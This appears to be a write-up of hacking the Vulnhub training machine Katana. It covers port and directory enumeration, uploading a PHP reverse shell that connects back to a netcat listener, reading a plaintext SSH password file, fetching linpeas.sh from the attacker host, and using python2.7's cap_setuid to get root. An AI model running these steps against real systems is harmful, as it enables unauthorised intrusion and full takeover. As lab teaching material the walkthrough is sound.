[VLN] Katana

Today we are going to hack the Vulnhub machine called Katana. You can download it from the following link: Katana

Video


Enumeration


We start with an nmap scan to see which ports are open.

sml@m0nique:~$ nmap -A -p- 192.168.112.129
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 17:26 CEST
Nmap scan report for katana.home (192.168.1.119)
Host is up (0.0011s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 89:4f:3a:54:01:f8:dc:b6:6e:e0:78:fc:60:a6:de:35 (RSA)
|   256 dd:ac:cc:4e:43:81:6b:e3:2d:f3:12:a1:3e:4b:a3:22 (ECDSA)
|_  256 cc:e6:25:c0:c6:11:9f:88:f6:c4:26:1e:de:fa:e9:8b (ED25519)
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Katana X
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/http    LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Katana X
| ssl-cert: Subject: commonName=katana/organizationName=webadmin/countryName=US
| Not valid before: 2020-05-11T13:57:36
|_Not valid after:  2022-05-11T13:57:36
|_ssl-date: 2020-05-16T15:26:44+00:00; 0s from scanner time.
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
8088/tcp open  http        LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Katana X
8715/tcp open  http        nginx 1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
Service Info: Host: KATANA; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h00m00s, deviation: 2h00m00s, median: 0s
|_nbstat: NetBIOS name: KATANA, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: katana
|   NetBIOS computer name: KATANA\x00
|   Domain name: \x00
|   FQDN: katana
|_  System time: 2020-05-16T11:26:41-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-16T15:26:40
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.89 seconds
We can see it has several open ports. After some investigation, we dig into port 8088 to see if we find anything interesting.

sml@m0nique:~$ gobuster dir -u http://192.168.112.129:8088 -w /usr/share/wordlists/dirb/big.txt -x txt,php,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.112.129:8088
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php,html
[+] Timeout:        10s
===============================================================
2020/05/22 23:03:06 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/blocked (Status: 301)
/cgi-bin (Status: 301)
/css (Status: 301)
/docs (Status: 301)
/error404.html (Status: 200)
/img (Status: 301)
/index.html (Status: 200)
/phpinfo.php (Status: 200)
/protected (Status: 301)
/upload.php (Status: 200)
/upload.html (Status: 200)
===============================================================
2020/05/22 23:03:12 Finished
===============================================================
We see a page called upload.html, which looks interesting. Opening it, it lets us upload files. Uploaded files get renamed. If we then use gobuster to search for the new file name, we find it served at http://192.168.112.129:8715/.

Exploitation


At http://192.168.112.129:8715/ we first have to log in using admin/admin :) So, knowing this, we prepare our reverse shell and edit it so it points back to our machine.

sml@m0nique:~$ cp /usr/share/webshells/php/php-reverse-shell.php  .
sml@m0nique:~$ mv php-reverse-shell.php shelli.php
sml@m0nique:~$ nano shelli.php
We upload it to http://192.168.112.129:8088/upload.html. The result we get back is:

File : file1
Name : reshell.php
Type : application/x-php
Path : /tmp/phpJMsNlv
Size : 5494
Please wait for 1 minute!. Please relax!.

Moved: /tmp/phpJMsNlv ====> /opt/manager/html/katana_shelli.php
MD5 : ad5545baba3150a5e5339ab720777fd4
Size : 5494 bytes
We see it has renamed our reverse shell to katana_shelli.php. We start nc listening on our machine.

sml@m0nique:~$ nc -nlvp 4444
And finally we visit http://192.168.112.129:8715/katana_reshell.php (remember that before "visiting" your shell you have to go to http://192.168.112.129:8715 and log in with admin/admin).

Low Shell



sml@m0nique:~$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.112.128] from (UNKNOWN) [192.168.112.129] 36014
Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
 05:04:56 up 14 min,  0 users,  load average: 0.05, 0.08, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
We are in; now we explore the system :)

$ python -c 'import pty; pty.spawn("/bin/sh")'
$ cd /home
$ ls
katana
$ cd katana
$ ls -la
total 32
drwxr-xr-x 4 katana katana 4096 May 21 05:04 .
drwxr-xr-x 3 root   root   4096 May 11 09:33 ..
-rw-r--r-- 1 katana katana  220 May 11 09:33 .bash_logout
-rw-r--r-- 1 katana katana 3526 May 11 09:33 .bashrc
drwx------ 3 katana katana 4096 May 11 11:57 .gnupg
-rw-r--r-- 1 katana katana  807 May 11 09:33 .profile
drwxrwxrwx 2 katana katana 4096 May 16 15:28 .ssh
-rw-r--r-- 1 root   root     19 May 11 11:52 .ssh_passwd
$ cat .ssh_passwd
katana@katana12345
It looks like the password of the katana user, so we try it...

$ su katana
Password: katana12345
python -c 'import pty; pty.spawn("/bin/sh")'
$ 
Now that we are the "katana" user, we download linpeas.sh from our machine to explore the system in more detail and see how we can escalate privileges.

$ cd /tmp
$ wget http://192.168.112.128/linpeas.sh
$ sh linpeas.sh
From the linpeas output, the part we are interested in is:

[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
We see that python2.7 has cap_setuid, which will let us escalate privileges...

Privilege Escalation



$ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
id
uid=0(root) gid=1000(katana) groups=1000(katana),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

root.txt



# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt  
cat root.txt
{R00t_key_Katana_91!}

End


And with that we are root on the machine :)